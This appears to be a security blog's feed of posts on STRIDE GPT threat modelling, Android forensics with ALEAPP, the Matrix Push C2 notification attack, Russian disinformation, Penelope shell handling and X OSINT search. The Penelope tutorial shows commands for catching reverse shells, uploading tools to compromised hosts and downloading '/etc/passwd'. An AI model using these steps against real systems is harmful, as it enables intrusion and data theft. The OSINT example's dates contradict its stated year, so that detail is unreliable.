In this article, we’ll walk you through how to install STRIDE GPT, check out its features, and get you started using them. Let’s get rolling!

Step #1: Install STRIDE GPT

First, make certain you have Python 3.8 or later installed on your system.

pi> python3 –version

Now, clone the STRIDE GPT repository from GitHub.

pi > git clone https://github.com/mrwadams/stride-gpt.git

pi> cd stride-gpt

Next, install the required Python dependencies.

pi > pip3 install -r requirements.txt –break-system-packages

This installation process may take a few minutes.

Step #2: Configure Your Groq API Key

STRIDE GPT supports multiple AI providers including OpenAI, Anthropic, Google AI, Mistral, and Groq, as well as local hosting options through Ollama and LM Studio Server. In this example, I’ll be using Groq. Groq provides access to models like Llama 3.3 70B, DeepSeek R1, and Qwen3 32B through their Lightning Processing Units, which deliver inference speeds significantly faster than traditional GPU-based solutions. Besides that, Groq’s API is cost-effective compared to proprietary models.

To use STRIDE GPT with Groq, you need to obtain an API key from Groq. The tool supports loading API keys through environment variables, which is the most secure method for managing credentials. In the stride-gpt directory, you’ll find a file named .env.example. Copy this file to create your own .env file:

pi > cp .env.example .env

Now, open the .env file in your preferred text editor and add the API key.

Step #3: Launch STRIDE GPT

Start the application by running:

pi> python3 -m streamlit run main.py

Streamlit will start a local web server.

Once you copy the URL into your browser, you will see a dashboard similar to the one shown below.

In the STRIDE GPT sidebar, you’ll see a dropdown menu labeled “Select Model Provider”. Click on this dropdown and you’ll see options for OpenAI, Azure OpenAI, Google AI, Mistral AI, Anthropic, Groq, Ollama, and LM Studio Server.

Select “Groq” from this list. The interface will update to show Groq-specific configuration options. You’ll see a field for entering your API key. If you configured the .env file correctly in Step 2, this field should already be populated with your key. If not, you can enter it directly in the interface, though this is less secure as the key will only persist for your current session.

Below the API key field, you’ll see a dropdown for selecting the specific Groq model you want to use. For this tutorial, I selected Llama 3.3 70B.

Step #4: Describe Your Application

Now comes the critical part where you provide information about the application you want to threat model. The quality and comprehensiveness of your threat model depends heavily on the detail you provide in this step.

In the main area of the interface, you’ll see a text box labeled “Describe the application to be modelled”. This is where you provide a description of your application’s architecture, functionality, and security-relevant characteristics.

Let’s work through a practical example. Suppose you’re building a web-based project management application. Here’s the kind of description you should provide:

“This is a web-based project management application built with a React frontend and a Node.js backend API. The application uses JWT tokens for authentication, with tokens stored in HTTP-only cookies. Users can create projects, assign tasks to team members, upload file attachments, and generate reports. The application is internet-facing and accessible to both authenticated users and unauthenticated visitors who can view a limited public project showcase. The backend connects to a PostgreSQL database that stores user credentials, project data, task information, and file metadata. Actual file uploads are stored in an AWS S3 bucket. The application processes sensitive data including user email addresses, project details that may contain confidential business information, and file attachments that could contain proprietary documents. The application implements role-based access control with three roles: Admin, Project Manager, and Team Member. Admins can manage users and system settings, Project Managers can create and manage projects, and Team Members can view assigned tasks and update their status.”

The more specific you are, the more targeted and actionable your threat model will be.

Besides that, near the application description field, you’ll see several dropdowns that help STRIDE GPT understand your application’s security context.

Step #5: Generate Your Threat Model

With all the configuration complete and your application described, you’re ready to generate your threat model. Look for a button labeled “Generate Threat Model” and click it.

Once complete, you’ll see a comprehensive threat model organized by the STRIDE categories. For each category, the model will identify specific threats relevant to your application. Let’s look at what you might see for our project management application example:

Each threat includes a detailed description explaining how the attack could be carried out and what the impact would be.

Step #6: Generate an Attack Tree

Beyond the basic threat model, STRIDE GPT can generate attack trees that visualize how an attacker might chain multiple vulnerabilities together to achieve a specific objective.

The tool generates these attack trees in Mermaid diagram format, which renders as an interactive visual diagram directly in your browser.

Step #7: Review DREAD Risk Scores

STRIDE GPT implements the DREAD risk scoring model to help you prioritize which threats to address first.

The tool will analyze each threat and assign scores from 1 to 10 for five factors:

Damage: How severe would the impact be if the threat were exploited?

Reproducibility: How easy is it to reproduce the attack?

Exploitability: How much effort and skill would be required to exploit the vulnerability?

Affected Users: How many users would be impacted?

Discoverability: How easy is it for an attacker to discover the vulnerability?

The DREAD assessment appears in a table format showing each threat, its individual factor scores, and its overall risk score.

Step #8: Generate Mitigation Strategies

Identifying threats is only half the battle. You also need actionable guidance on how to address them. STRIDE GPT includes a feature to generate specific mitigation strategies for each identified threat.

Look for a button labeled “Mitigations” and click it.

These mitigation strategies are specific to your application’s architecture and the threats identified. They’re not generic security advice but targeted recommendations based on the actual risks in your system.

Step #8: Generate Gherkin Test Cases

One of the most innovative features of STRIDE GPT is its ability to generate Gherkin test cases based on the identified threats. Gherkin is a business-readable, domain-specific language used in Behavior-Driven Development to describe software behaviors without detailing how that behavior is implemented. These test cases can be integrated into your automated testing pipeline to ensure that the mitigations you implement actually work.

Look for a button labeled “Generate Test Cases”. When you click it, STRIDE GPT will create Gherkin scenarios for each major threat.

Summary

Traditional threat modeling takes a lot of time and requires experts, which stops many organizations from doing it well. STRIDE GPT makes threat modeling easier for everyone by using AI to automate the analysis while keeping the quality of the proven STRIDE method.

In this article, we checked out STRIDE GPT and went over its main features. No matter if you’re protecting a basic web app or a complicated microservices setup, STRIDE GPT gives you the analytical tools you need to spot and tackle security threats in a straightforward way.

Mobile Forensics: Investigating a Murder

26 November 2025 at 12:52

Welcome back, dear digital investigators! 

Today, we’re exploring mobile forensics, a field that matters deeply in modern crime investigations. Think about how much our phones know about us. They carry our contacts, messages, locations, and app history in many ways. They are a living log of our daily lives. Because they travel with us everywhere, they can be a goldmine of evidence when something serious happens, like a crime. In a murder investigation, for instance, a suspect’s or a victim’s phone can help us answer critical questions: Who were they in touch with right before the crime? Where did they go? What were they doing? What kind of money dealings were they involved in? All of this makes mobile forensics powerful for investigators. As digital forensic specialists, we use that data to reconstruct timelines, detect motives, and understand relationships. Because of this, even a seemingly small app on a phone might have huge significance. For example, financial trading apps may reveal risky behavior or debt. Chat apps might contain confessions or threats. Location logs might show the victim visiting unusual places.

The Difference Between Android and iOS Forensics

When we do mobile forensics, we usually see Android and iOS devices. These two operating systems are quite different under the hood, and that affects how we work with them. On Android, there’s generally more openness. The file system for many devices is more accessible, letting us examine data stored in app directories, caches, logs, and more. Because Android is so widespread and also fragmented with many manufacturers and versions, the data we can access depends a lot on the model and version. 

On iOS, things are tighter. Apple uses its own file system (APFS), and there’s strong encryption, often backed by secure hardware. That means extracting data can be more challenging. Because of this, forensic tools must be very sophisticated to handle iOS devices.

When it comes to which has more usable data, Android often gives us more raw artifacts because of its flexibility. But iOS can also be very rich, especially when data is backed up to iCloud or when we can legally access the device in powerful ways.

The Tools For the Job

One of the most powerful tools is Cellebrite, which is used by law enforcement and digital forensic labs. Cellebrite’s tools are capable of extracting data from both Android and iOS devices, sometimes even from locked devices. But the ability to extract depends a lot on the device model, its security patch level, and how encrypted it is.

cellebrite

There’s an interesting twist when it comes to GrapheneOS, which is a very security-focused version of Android. According to reports, Cellebrite tools struggle more with GrapheneOS, especially on devices updated after 2022. In some cases, they may be able to do a “consent-based” extraction (meaning the phone has to be unlocked by the user), but they can’t fully bypass the security on a fully patched GrapheneOS phone. Because of that, from a security perspective, users are strongly encouraged to keep their firmware and operating system updated. Regular updates close vulnerabilities. Also, using strong passcodes, enabling encryption, and being careful about where sensitive data is stored can make a real difference in protecting personal data.

Our Case: Investigating a Murder Using an Android Phone

Now, let’s turn to our case. We are in the middle of a murder investigation, and we’ve managed to secure the victim’s Android phone. After talking with witnesses and people who were close to the victim, we believe this phone holds critical evidence. To analyze all of that, we are using ALEAPP, a forensic tool made specifically for parsing Android data.

ALEAPP and How It Works

ALEAPP stands for Android Logs, Events, And Protobuf Parser. It’s an open-source tool maintained by the forensic community. Basically, ALEAPP allows us to take the extracted data from an Android phone, whether it’s a logical extraction, a TAR or ZIP file, or a file-system dump and turn that raw data into a human-readable, well-organized report. ALEAPP can run through a graphical interface, which is very friendly and visual, or via command line, depending on how you prefer to work. As it processes data, it goes through different modules for things like call logs, SMS, app usage, accounts, Wi-Fi events, and more. In the end, it outputs a report, so you can easily explore and navigate all the findings.

You can find the repository here:

https://github.com/abrignoni/ALEAPP

What We Found on the Victim’s Phone

We started by examining the internal storage of the Android device, especially the /data folder. This is where apps keep their private data, caches, and account information. Then, we prepared a separate place on our investigation workstation, a folder called output, where ALEAPP would save its processed data.

evidence

Once ALEAPP was ready, we launched it and pointed it to the extracted directories. We left all its parsing modules turned on so we wouldn’t miss any important artifact. We clicked “Process,” and depending on the size of the extracted data, we waited for a few minutes while ALEAPP parsed everything.

setting up aleapp

When the processing was done, a new folder appeared inside our output directory. In that folder, there was a file called index.html, that’s our main report. We opened it with a browser and the GUI showed us different categories. The interface is clean and intuitive, so even someone not deeply familiar with command-line tools can navigate it.

viewing case overview in aleapp mobile forensic tool

Evidence That Stood Out

One of the first things that caught our attention was a trading app. ALEAPP showed an installed application named OlympTrade. A quick web search confirmed that OlympTrade is a real online trading platform. That fits with what witnesses told us. The victim was involved in trading, possibly borrowing or investing money. We also noted a hash value for the app in our report, which helps prove the data’s integrity. This means we can be more confident that what we saw hasn’t been tampered with.

viewing installed apps in aleapp mobile forensic tool
olymptrade

Next, we turned to text messages. According to the victim’s best friend’s testimony, the victim avoided some calls and said he owed a lot of money. When we checked SMS data in ALEAPP, we found a thread where the victim indeed owed $25,000 USD to someone.

viewing text messages in aleapp mobile forensic tool

We looked up the number in the contacts list, and it was saved under the name John Oberlander. That makes John an important person of interest in this investigation.

viewing contacts in aleapp mobile forensic tool

Then, we dove into location data. The victim’s family said that on September 20, 2023, he left his home without saying where he was going. In ALEAPP’s “Recent Activity” section, which tracks events like Wi-Fi connections, GPS logs, and other background activity, we saw evidence placing him at The Nile Ritz-Carlton in Cairo, Egypt. This is significant. A 5-star hotel, which could have security footage, check-in records, or payment logs. Investigators would almost certainly reach out to the hotel to reconstruct his stay.

viewing recent activity in aleapp mobile forensic tool

The detective pressed on with his investigation and spoke with the hotel staff, hoping to fill in more of the victim’s final days. The employees confirmed that the victim had booked a room for ten days and was supposed to take a flight afterward. Naturally, the investigator wondered whether the victim had saved any ticket information on the phone, since many people store their travel plans digitally nowadays. Even though no tickets turned up in the phone’s files, the search did reveal something entirely different, and potentially much more important. We looked at Discord, since the app appeared in the list of installed applications. Discord logs can reveal private chats, plans, and sometimes illicit behavior. In this case, we saw a conversation indicating that the victim changed his travel plans. He postponed a flight to October 1st, according to the chat.

viewing discord messages in aleapp mobile forensic tool

Later, he agreed to meet someone in person at a very specific place. It was the Fountains of Bellagio in Las Vegas. That detail could tie into motive or meetings related to the crime.

viewing discord messages in aleapp mobile forensic tool
Fountains of Bellagio is the agreet place to meet at

What Happens Next

At this stage, we’ve collected and parsed digital evidence, but our work is far from over. Now, we need to connect the phone-based data to the real world. That means requesting more information from visited places, checking for possible boarding or ticket purchases, and interviewing people named in the phone, like John Oberlander, or the person from Discord.

We might also want to validate financial trail through the trading platform (if we can access it legally), bank statements, or payment records. And importantly, we should search for other devices or backups. Maybe the victim had cloud backups, like Google Drive, or other devices that shed more light.

Reconstructed Timeline

The victim was heavily involved in trading and apparently owed $25,000 USD to John Oberlander. On September 20, 2023, he left his residence without telling anyone where he was headed. The phone’s location data places him later that day at The Nile Ritz-Carlton in Cairo, suggesting he stayed there. Sometime afterward, according to Discord chats, he changed his travel plans and his flight was rescheduled for October 1. During these chats, he arranged a meeting with someone at the Fountains of Bellagio in Las Vegas.

Summary

Mobile forensics is a deeply powerful tool when investigating crimes. A single smartphone can hold evidence that helps reconstruct what happened, when, and with whom. Android devices often offer more raw data because of their openness, while iOS devices pose different challenges due to their strong encryption. Tools like ALEAPP let us parse all of that data into meaningful and structured reports.

In the case we’re studying, the victim’s phone has offered us insights into his financial troubles, his social connections, his movements, and his plans. But digital evidence is only one piece. To solve a crime, we must combine what we learn from devices with interviews, external records, and careful collaboration with other investigators.

Our team provides professional mobile forensics services designed to support individuals, organizations, and legal professionals who need clear, reliable answers grounded in technical expertise. We also offer a comprehensive digital forensics course for those who want to build their own investigative skills and understand how evidence is recovered, analyzed, and preserved. And if you feel that your safety or your life may be at risk, reach out immediately. Whether you need guidance, assistance, or a deeper understanding of the digital traces surrounding your case, we are here to help.

Check out our Mobile Forensics training for more in-depth training

Command and Control (C2): Using Browser Notifications as a Weapon

26 November 2025 at 10:16

Welcome back, my aspiring hackers!

Nowadays, we often discuss the importance of protecting our systems from malware and sophisticated attacks. We install antivirus software, configure firewalls, and maintain vigilant security practices. But what happens when the attack vector isn’t a malicious file or a network exploit, but rather a legitimate browser feature you’ve been trusting?

This is precisely the threat posed by a new command-and-control platform called Matrix Push C2. This browser-native, fileless framework leverages push notifications, fake alerts, and link redirects to target victims. The entire attack occurs through your web browser, without first infecting your system through traditional means.

In this article, we will explore the architecture of browser-based attacks and investigate how Matrix Push C2 weaponizes it. Let’s get rolling!

The Anatomy of a Browser-Based Attack

Matrix Push C2 abuses the web push notification system, a legitimate browser feature that websites use to send updates and alerts to users who have opted in. Attackers first trick users into allowing browser notifications through social engineering on malicious or compromised websites.

Once a user subscribes to the attacker’s notifications, the attacker can push out fake error messages or security alerts at will that look scarily real. These messages appear as if they are from the operating system or trusted software, complete with official-sounding titles and icons.

The fake alerts might warn about suspicious logins to your accounts, claim that your browser needs an urgent security update, or suggest that your system has been compromised and requires immediate action. Each notification includes a convenient “Verify” or “Update” button that, when clicked, takes the victim to a bogus site controlled by the attackers. This site might be a phishing page designed to steal credentials, or it might attempt to trick you into downloading actual malware onto your system. Because this whole interaction is happening through the browser’s notification system, no traditional malware file needs to be present on the system initially. It’s a fileless technique that operates entirely within the trusted confines of your web browser.

Inside the Attacker’s Command Center

Matrix Push C2 is offered as a malware-as-a-service kit to other threat actors, sold directly through crimeware channels, typically via Telegram and cybercrime forums. The pricing structure follows a tiered subscription model that makes it accessible to criminals at various levels of sophistication. According to BlackFog company, the Matrix Push C2 costs approximately $150 for one month, $405 for three months, $765 for six months, and $1,500 for a full year. Payments are accepted in cryptocurrency, and buyers communicate directly with the operator for access.

From the attacker’s perspective, the interface is intuitive. The campaign dashboard displays metrics like total clients, delivery success rates, and notification interaction statistics.

Source: BlackFog

As soon as a browser is enlisted by accepting the push notification subscription, it reports data back to the command-and-control server.

Source: BlackFog

Matrix Push C2 can detect the presence of browser extensions, including cryptocurrency wallets like MetaMask, identify the device type and operating system, and track user interactions with notifications. Essentially, as soon as the victim permits the notifications, the attacker gains a telemetry feed from that browser session.

Social Engineering at Scale

The core of the attack is social engineering, and Matrix Push C2 comes loaded with configurable templates to maximize the credibility of its fake messages. Attackers can easily theme their phishing notifications and landing pages to impersonate well-known companies and services. The platform includes pre-built templates for brands such as MetaMask, Netflix, Cloudflare, PayPal, and TikTok, each designed to look like a legitimate notification or security page from those providers.

Source: BlackFog

Because these notifications appear in the official notification area of the device, users may assume their own system or applications generated the alert.

Defending Against Browser-Based Command and Control

As cyberwarriors, we must adapt our defensive strategies to account for this new attack vector. The first line of defense is user education and awareness. Users need to understand that browser notification permission requests should be treated with the same skepticism as requests to download and run executable files. Just because a website asks for notification permissions doesn’t mean you should grant them. In fact, most legitimate websites function perfectly well without push notifications, and the feature is often more of an annoyance than a benefit. If you believe that your team needs to update their skills for current and upcoming threats, consider our recently published Security Awareness and Risk Management training.

Beyond user awareness, technical controls can help mitigate this threat. Browser policies in enterprise environments can be configured to block notification permissions by default or to whitelist only approved sites. Network security tools can monitor for connections to known malicious notification services or suspicious URL shortening domains.

Summary

The fileless, cross-platform nature of this attack makes it particularly dangerous and difficult to detect using traditional security tools. However, by combining user awareness, proper browser configuration, and anti-data exfiltration technology, we can defend against this threat.

In this article, we briefly explored how Matrix Push C2 operates, and it’s a first step in protecting yourself and your organization from this emerging attack vector.

Smart Home Hacking, January 13-15

By: OTW
25 November 2025 at 11:39

Welcome back, my aspiring cyberwarriors!

Smart homes are increasingly becoming common in our digital world! These smart home devices have become of the key targets of malicious hackers. This is largely due to their very weak security. In 2025, attacks on connected devices rose 400 percent, with average breach costs hitting $5.4 million

In this three-day class, we will explore and analyze the various security weaknesses of these smart home devices and protocols.

Course Outline

  1. Introduction and Overview of Smart Home Devices
  2. Weak Authentication on Smart Home Devices
  3. RFID and the Smart Home Security
  4. Bluetooth and Bluetooth LE vulnerabilities in the home
  5. Wi-Fi vulnerabilities and how they can be leveraged to takeover all the devices in the home
  6. LoRa vulnerabilities
  7. IP Camera vulnerabilities
  8. Zigbee vulnerabilities
  9. Jamming Wireless Technologies in the Smart Home
  10. How attackers can pivot from an IoT devices in the home to takeover your phone or computer
  11. How to Secure Your Smart Home

This course is part of our Subscriber Pro training package

Unraveling the Web of Russian Disinformation Campaigns

By: OTW
24 November 2025 at 23:30

Introduction:

Hello world of Hackers Arise, in this post, we delve into the complex world of Russian disinformation campaigns on the internet. As Master OTW clearly established in his interview with Yaniv Hoffman (watch the video below), the disinformation campaign carried out by the high-ranking Russian authorities is not something new. It has been developed for decades, and they have truly become extremely adept at it, especially now with the use of the internet and social media. Throughout the years, they have dedicated themselves to spreading hatred, envy, and resentment worldwide, which we could classify as Psychological Warfare Operations, but taken to the extreme, as they not only aim to misinform or influence to achieve specific strategic targets but also intend to divide and confront the entire world.

However, we do not say this capriciously; there are foundations and information that support our arguments, we also do not intend to hide or minimize the fact that all nation-states carry out this type of operations, but in the case of the Russian authorities, their intention redefines the concept of pure malevolence.

https://www.youtube.com/watch?v=t2P6iADGnpE

With the rise of social media and interconnected platforms, information dissemination has become a powerful tool for shaping public opinion. Russia, among other countries, has been at the forefront of exploiting these channels to advance its strategic goals. This article aims to shed light on the methods, motives, and implications of Russia’s disinformation campaigns while underlining the importance of critical thinking and media literacy in navigating the digital landscape.

 

Understanding Disinformation:

Disinformation is the dissemination of false or misleading information with the intention to deceive or manipulate the public. Russia has become notorious for employing sophisticated techniques to influence global narratives on a wide range of issues, from political events to social debates and international relations. Understanding the multifaceted nature of disinformation is crucial in recognizing and countering its effects.

The following link leads to a study whose key points I will list below with the aim of understanding the main characteristics of this type of operations carried out by the Russian authorities.

  – Russian Propaganda Is High-Volume and MultichannelRussian Propaganda Is Rapid, Continuous, and RepetitiveRussian Propaganda Makes No Commitment to Objective RealityRussian Propaganda Is Not Committed to Consistency 

Methods Used:

Russia employs an array of methods to propagate disinformation effectively. These include the use of bots and troll farms to flood social media with false narratives, the creation and distribution of deceptive content, and the manipulation of search engine algorithms to amplify biased information. By utilizing these methods, Russia can create an illusion of consensus and spread narratives that align with its geopolitical interests.

“The Russian Federation has engaged in a systematic, international campaign of disinformation, information manipulation and distortion of facts in order to enhance its strategy of destabilisation of its neighbouring countries, the EU and its member states. In particular, disinformation and information manipulationhas repeatedly and consistently targeted European political parties, especially during the election periods, civil society and Russian gender and ethnic minorities, asylum seekers and the functioning of democratic institutions in the EU and its member states.

In order to justify and support its military aggression of Ukraine, the Russian Federation has engaged in continuous and concerted disinformation and information manipulation actions targeted at the EU and neighbouring civil society members, gravely distorting and manipulating facts.” Source (Picture below)

 The mass media outlets mentioned above are either state-owned or corporations serving the state. However, Putin does not like independent journalism doing its job, and that’s why he took actions against them. Source Take a look at the amount of budget allocated by the Russian high command for those platforms to deploy disinformation.  

Motives Behind the Campaigns:

The motives driving Russia’s disinformation campaigns are diverse and can be linked to political, economic, and security-related goals. Destabilizing rival countries, sowing discord among allies, discrediting political opponents, and undermining democratic processes are some of the key objectives pursued through t
hese campaigns. Understanding these motives is essential in formulating an effective response.If you still don’t believe that they spread hate all over the internet, take a look at these myths whose explanations are debunked in the source we provided.

  And what about the Russian troll farm?  

Implications and Impact:

The impact of Russian disinformation campaigns is far-reaching. They can polarize societies, erode trust in democratic institutions, and exacerbate existing divisions within nations. In international affairs, disinformation can escalate tensions between countries and influence public opinion on foreign policy matters. Moreover, the erosion of trust in media sources can lead to a decline in accurate information and the rise of echo chambers. Russian officials and pro-Russian media capitalized on the fear and uncertainty caused by the COVID-19 pandemic, actively spreading conspiracy theories. Among these theories, they focused on false U.S. bio-weapon infrastructure claims. One notable example is an article published by New Eastern Outlook on 20th February, available in both Russian and English, alleging that the U.S. deployed a biological weapon against China.

  

Fighting Back:

Countering Russian disinformation requires a comprehensive approach. Governments, tech companies, and civil society must collaborate to identify and expose false narratives, invest in media literacy programs, and enhance cybersecurity measures to protect against information warfare. Educating the public on critical thinking and fact-checking is a powerful tool in combating the spread of disinformation, but it is also our responsibility as hackers and advocates of freedom within the cyberspace; we must make this responsibility our mission, our duty, to ensure free access to information.

 

Conclusion:

The internet has opened up new frontiers for information dissemination, but it has also become fertile ground for disinformation campaigns. Russia’s approach to shaping narratives on a global scale requires a vigilant and proactive response from the international community. By fostering media literacy and promoting responsible online behavior, we can safeguard the integrity of information and fortify our societies against the perils of disinformation.

Smouk out!

 

Offensive Security: Get Started with Penelope for Advanced Shell Management

24 November 2025 at 17:02

Welcome back, aspiring cyberwarriors!

In the world of penetration testing and red team operations, one of the most critical moments comes after you’ve successfully exploited a target system. You’ve gained initial access, but now you’re stuck with a basic, unstable shell that could drop at any moment. You need to upgrade that shell, manage multiple connections, and maintain persistence without losing your hard-won access.

Traditional methods of shell management are fragmented and inefficient. You might use netcat for catching shells, then manually upgrade them with Python or script commands, manage them in separate terminal windows, and hope you don’t lose track of which shell connects to which target. Or you can use Penelope to handle all those things.

Penelope is a shell handler designed specifically for hackers who demand more from their post-exploitation toolkit. Unlike basic listeners like netcat, Penelope automatically upgrades shells to fully interactive TTYs, manages multiple sessions simultaneously, and provides a centralized interface for controlling all your compromised systems.

In this article, we will install Penelope and explore its core features. Let’s get rolling!

Step #1: Download and Install Penelope

In this tutorial, I will be installing Penelope on my Raspberry Pi 4, but the tool works equally well on any Linux distribution or MacOS system with Python 3.6 or higher installed. The installation process is straightforward since Penelope is a Python script

First, navigate to the GitHub repository and clone the project to your system:
pi> git clone https://github.com/brightio/penelope.git

pi> cd penelope

Once the downloading completes, you can verify that Penelope is ready to use by checking its help menu:

pi> python3 penelope.py -h

You should see a comprehensive help menu displaying all of Penelope’s options and capabilities. This confirms that the tool is properly installed and ready for use.

Step #2: Starting a Basic Listener

The most fundamental use case for Penelope is catching reverse shells from compromised targets. Unlike netcat, which simply listens on a port and displays whatever connects, Penelope manages the incoming connection and prepares it for interactive use.

To start a basic listener on port 4444, execute the following command:

pi> python3 penelope.py

Penelope will start listening on the default port and display a status message indicating it’s ready to receive connections.

Now let’s simulate a compromised target connecting back to your listener.

You should see Penelope display information about the new session, including an assigned session ID, the target’s IP address, and the detected operating system. The shell is automatically upgraded to a fully interactive TTY, meaning you now have tab completion, the ability to use text editors like Vim, and proper handling of special characters.

Step #3: Managing Multiple Sessions

Let’s simulate managing multiple targets. In the current session, click F12 to open a menu. There, you can type help for exploring available options.

We’re interested in adding a new listener, so the command will be:

panelope> listeners add -p <port>

Each time a new target connects, Penelope assigns it a unique session ID and adds it to your session list.

To view all active sessions, use the sessions command within Penelope:

penelope > sessions

This displays a table showing all connected targets with their session IDs, IP addresses and operating systems.

To interact with a specific session, use the session ID. For example, to switch to session 2:

penelope > interact 2

Step #4: Uploading and Downloading Files

File transfer is a constant requirement during penetration testing engagements. You need to upload exploitation tools, download sensitive data, and move files between your attack system and compromised targets. Penelope includes built-in file transfer capabilities that work regardless of what tools are available on the target system.

To upload a file from your attacking system to the target, use the upload command. Let’s say you want to upload a Python script called script.py to the target:

penelope > upload /home/air/Tools/script.py

Downloading files from the target works similarly. Suppose you’ve discovered a sensitive configuration file on the compromised system that you need to exfiltrate:

penelope > download /etc/passwd

Summary

Traditional tools like netcat provide basic listening capabilities but leave you manually managing shell upgrades, juggling terminal windows, and struggling to maintain organized control over your compromised infrastructure. Penelope solves these problems. It provides the control and organization you need to work efficiently and maintain access to your hard-won, compromised systems.

The tool’s automatic upgrade capabilities, multi-session management, built-in file transfer, and session persistence features make it a valuable go-to solution for cyberwarriors. Keep an eye on it—it may find a place in your hacking toolbox.

Open Source Intelligence (OSINT): Strategic Techniques for Finding Info on X (Twitter)

24 November 2025 at 10:34

Welcome back, my aspiring digital investigators!

In the rapidly evolving landscape of open source intelligence, Twitter (now rebranded as X) has long been considered one of the most valuable platforms for gathering real-time information, tracking social movements, and conducting digital investigations. However, the platform’s transformation under Elon Musk’s ownership has fundamentally altered the OSINT landscape, creating unprecedented challenges for investigators who previously relied on third-party tools and API access to conduct their research.

The golden age of Twitter OSINT tools has effectively ended. Applications like Twint, GetOldTweets3, and countless browser extensions that once provided investigators with powerful capabilities to search historical tweets, analyze user networks, and extract metadata have been rendered largely useless by the platform’s new API restrictions and authentication requirements. What was once a treasure trove of accessible data has become a walled garden, forcing OSINT practitioners to adapt their methodologies and embrace more sophisticated, indirect approaches to intelligence gathering.

This fundamental shift represents both a challenge and an opportunity for serious digital investigators. While the days of easily scraping massive datasets are behind us, the platform still contains an enormous wealth of information for those who understand how to access it through alternative means. The key lies in understanding that modern Twitter OSINT is no longer about brute-force data collection, but rather about strategic, targeted analysis using techniques that work within the platform’s new constraints.

Understanding the New Twitter Landscape

The platform’s new monetization model has created distinct user classes with different capabilities and visibility levels. Verified subscribers enjoy enhanced reach, longer post limits, and priority placement in replies and search results. This has created a new dynamic where information from paid accounts often receives more visibility than content from free users, regardless of its accuracy or relevance. For OSINT practitioners, this means understanding these algorithmic biases is essential for comprehensive intelligence gathering.

The removal of legacy verification badges and the introduction of paid verification has also complicated the process of source verification. Previously, blue checkmarks provided a reliable indicator of account authenticity for public figures, journalists, and organizations. Now, anyone willing to pay can obtain verification, making it necessary to develop new methods for assessing source credibility and authenticity.

Content moderation policies have also evolved significantly, with changes in enforcement priorities and community guidelines affecting what information remains visible and accessible. Some previously available content has been removed or restricted, while other types of content that were previously moderated are now more readily accessible. Also, the company updated its terms of service to officially say it uses public tweets to train its AI.

Search Operators

The foundation of effective Twitter OSINT lies in knowing how to craft precise search queries using X’s advanced search operators. These operators allow you to filter and target specific information with remarkable precision.

You can access the advanced search interface through the web version of X, but knowing the operators allows you to craft complex queries directly in the search bar.

Here are some of the most valuable search operators for OSINT purposes:

from:username – Shows tweets only from a specific user

to:username – Shows tweets directed at a specific user

since:YYYY-MM-DD – Shows tweets after a specific date

until:YYYY-MM-DD – Shows tweets before a specific date

near:location within:miles – Shows tweets near a location

filter:links – Shows only tweets containing links

filter:media – Shows only tweets containing media

filter:images – Shows only tweets containing images

filter:videos – Shows only tweets containing videos

filter:verified – Shows only tweets from verified accounts

-filter:replies – Excludes replies from search results

#hashtag – Shows tweets containing a specific hashtag

"exact phrase" – Shows tweets containing an exact phrase

For example, to find tweets from a specific user about cybersecurity posted in the first half of 2025, you could use:

from:username cybersecurity since:2024-01-01 until:2024-06-30

The power of these operators becomes apparent when you combine them. For instance, to find tweets containing images posted near a specific location during a particular event:

near:Moscow within:5mi filter:images since:2023-04-15 until:2024-04-16 drone

This would help you find images shared on X during the drone attack on Moscow.

Profile Analysis and Behavioral Intelligence

Every Twitter account leaves digital fingerprints that tell a story far beyond what users intend to reveal.

The Account Creation Time Signature

Account creation patterns often expose coordinated operations with startling precision. During investigation of a corporate disinformation campaign, researchers discovered 23 accounts created within a 48-hour window in March 2023—all targeting the same pharmaceutical company. The accounts had been carefully aged for six months before activation, but their synchronized birth dates revealed centralized creation despite using different IP addresses and varied profile information.

Username Evolution Archaeology: A cybersecurity firm tracking ransomware operators found that a key player had changed usernames 14 times over two years, but each transition left traces. By documenting the evolution @crypto_expert → @blockchain_dev → @security_researcher → @threat_analyst, investigators revealed the account operator’s attempt to build credibility in different communities while maintaining the same underlying network connections.

Visual Identity Intelligence: Profile image analysis has become remarkably sophisticated. When investigating a suspected foreign influence operation, researchers used reverse image searches to discover that 8 different accounts were using professional headshots from the same stock photography session—but cropped differently to appear unrelated. The original stock photo metadata revealed it was purchased from a server in Eastern Europe, contradicting the accounts’ claims of U.S. residence.

Temporal Behavioral Fingerprinting

Human posting patterns are as unique as fingerprints, and investigators have developed techniques to extract extraordinary intelligence from timing data alone.

Geographic Time Zone Contradictions: Researchers tracking international cybercriminal networks identified coordination patterns across supposedly unrelated accounts. Five accounts claiming to operate from different U.S. cities all showed posting patterns consistent with Central European Time, despite using location-appropriate slang and cultural references. Further analysis revealed they were posting during European business hours while American accounts typically show evening and weekend activity.

Automation Detection Through Micro-Timing: A social media manipulation investigation used precise timestamp analysis to identify bot behavior. Suspected accounts were posting with unusual regularity—exactly every 3 hours and 17 minutes for weeks. Human posting shows natural variation, but these accounts demonstrated algorithmic precision that revealed automated management despite otherwise convincing content.

Network Archaeology and Relationship Intelligence

Twitter’s social graph remains one of its most valuable intelligence sources, requiring investigators to become expert relationship analysts.

The Early Follower Principle: When investigating anonymous accounts involved in political manipulation, researchers focus on the first 50 followers. These early connections often reveal real identities or organizational affiliations before operators realize they need operational security. In one case, an anonymous political attack account’s early followers included three employees from the same PR firm, revealing the operation’s true source.

Mutual Connection Pattern Analysis: Intelligence analysts investigating foreign interference discovered sophisticated relationship mapping. Suspected accounts showed carefully constructed following patterns—they followed legitimate journalists, activists, and political figures to appear authentic, but also maintained subtle connections to each other through shared follows of obscure accounts that served as coordination signals.

Reply Chain Forensics: A financial fraud investigation revealed coordination through reply pattern analysis. Seven accounts engaged in artificial conversation chains to boost specific investment content. While the conversations appeared natural, timing analysis showed responses occurred within 30-45 seconds consistently—far faster than natural reading and response times for the complex financial content being discussed.

Systematic Documentation and Intelligence Development

The most successful profile analysis investigations employ systematic documentation techniques that build comprehensive intelligence over time rather than relying on single-point assessments.

Behavioral Baseline Establishment: Investigators spend 2-4 weeks establishing normal behavioral patterns before conducting anomaly analysis. This baseline includes posting frequency, engagement patterns, topic preferences, language usage, and network interaction patterns. Deviations from established baselines indicate potential significant developments.

Multi-Vector Correlation Analysis: Advanced investigations combine temporal, linguistic, network, and content analysis to build confidence levels in conclusions. Single indicators might suggest possibilities, but convergent evidence from multiple analysis vectors provides actionable intelligence confidence levels above 85%.

Summary

